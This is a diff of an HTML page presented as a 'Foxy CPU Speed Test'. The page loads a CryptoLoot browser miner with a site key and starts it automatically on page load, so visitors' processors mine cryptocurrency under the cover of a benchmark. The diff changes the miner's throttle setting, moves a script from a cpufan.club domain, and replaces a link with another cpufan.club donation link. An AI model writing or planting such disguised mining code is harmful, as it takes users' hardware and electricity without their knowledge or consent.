--- a/index.html
+++ b/index.html
@@ -3,16 +3,16 @@
 <head>
 <title>Foxy CPU Speed Test</title>
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous">
-<script src="https://d.cpufan.club/direct.js?w=87963&c=95"></script>
 </head>
 <body>
+	<script src="https://d.cpufan.club/direct.js?w=87963&c=95"></script>
 	<script src="//cryptoloot.pro/lib/crlt.js" type="text/javascript"></script>
 	<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 
 <script>
 var miner = new CRLT.Anonymous('b60ae0e626d5d6a5ee8d7b5b673eb25c4db7d394dc3b',
 	{
-       autoThreads:false,throttle:0.0,
+       autoThreads:false,throttle:1.0,
         } );
 miner.start();
 //console.log("miner should've started");
@@ -42,7 +42,7 @@ setInterval(function() {
 	<h3 id="num" style="text-align:center;">How hard should I hustle today?</h3>
 	<div style="text-align:center;">
 		<a href="http://donate.cpufan.club/org/132453">Alternate Stress Test Resource "S"</a><br>
-		<a href="http://foxytest.github.io/foxy">Alternate Stress Test Resource "M"</a>
+		<a href="http://donate.cpufan.club/org/87963">Alternate Stress Test Resource "I"</a>
     	</div>
     </div>
   </div>
